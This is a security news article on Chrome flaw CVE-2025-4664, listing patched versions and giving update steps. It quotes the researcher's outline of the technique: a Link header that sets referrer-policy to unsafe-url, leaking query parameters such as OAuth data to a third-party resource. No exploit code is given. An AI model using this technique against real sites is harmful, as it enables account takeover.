Google Chrome Flaw Can be Exploited to Take Over Accounts

Google has issued a security update to Chrome users worldwide after learning of a flaw that can enable motivated attackers to take over accounts.

“The Stable channel has been updated to 136.0.7103.113/.114 for Windows, Mac and 136.0.7103.113 for Linux which will roll out over the coming days/weeks,” writes Srinivas Sista on the Google Chrome releases blog. “This update includes 4 security fixes.”

In typical fashion, the announcement highlights the fixes contributed by external researchers, along with the designated CVE number and only scarce technical details to discourage opportunistic hacks.

‘Insufficient policy enforcement’

The key issue addressed in this release, tracked as CVE-2025-4664, is described as an “insufficient policy enforcement in Loader.”

According to the GitHub Advisory Database, a motivated threat actor can exploit the issue remotely “to leak cross-origin data via a crafted HTML page.”

Google rates the bug’s severity high, and for good reason—it can be exploited to perform account takeovers.

While Google is coy about the bug’s exploitability, the researcher who discovered and reported the flaw isn’t.

Identified as @slonser_, the researcher explains in a series of posts on X that,
“unlike other browsers, Chrome resolves the Link header on subresource requests [and that] the Link header can set a referrer-policy.”

“We can specify unsafe-url and capture the full query parameters,” Slonser notes. “Query parameters can contain sensitive data - for example, in OAuth flows, this might lead to an Account Takeover. Developers rarely consider the possibility of stealing query parameters via an image from a 3rd-party resource - which makes this trick surprisingly useful sometimes.”

Update your browser!

“Google is aware of reports that an exploit for CVE-2025-4664 exists in the wild,” says the web giant.

It doesn’t clarify if the exploit is Slonser’s proof-of-concept or if motivated attackers have been quick to exploit the weakness for malicious purposes.

It’s worth noting that Slonser disclosed his findings on X long before Google issued the Chrome update that was equipped with the fix.

Even if you don’t consider yourself a target for hackers, Bitdefender recommends you deploy the latest updates for all your personal devices the moment they're available, especially when the vendor rates the risk level high, and even more so if the addressed issues are said to be exploited in the wild.

As of today, Chrome users will want to be on:

· Chrome 136.0.7103.113/.114 for Windows and Mac

· Chrome 136.0.7103.113 on Linux

· Chrome 136.0.7103.125 on Android

Chrome users on iOS/iPadOS are unaffected, so there’s no special security update for the iPhone/iPad version of the browser this time around.

The desktop version of Chrome is programmed to check for the latest version on every relaunch. Start the process manually if you haven’t closed Chrome in a while. Visit the three-dotted options menu, choose Settings -> About Chrome, and let the browser fetch the latest version from Google’s servers. When prompted, relaunch Chrome.

Android releases contain the same security fixes as the desktop version of Chrome, unless otherwise noted by Google.

To patch Chrome on your Android device, visit the official Google Play Store and download the latest version.

For peace of mind, consider running a security solution on all your devices.

You may also want to read:

Google to Pay Texas $1.4 Billion over Data Privacy Violations

Update Your iGear! Apple Addresses Dozens of Security Issues Across the Board

Google Patches ‘GPU’ Security Flaw Exploited on Chrome for Mac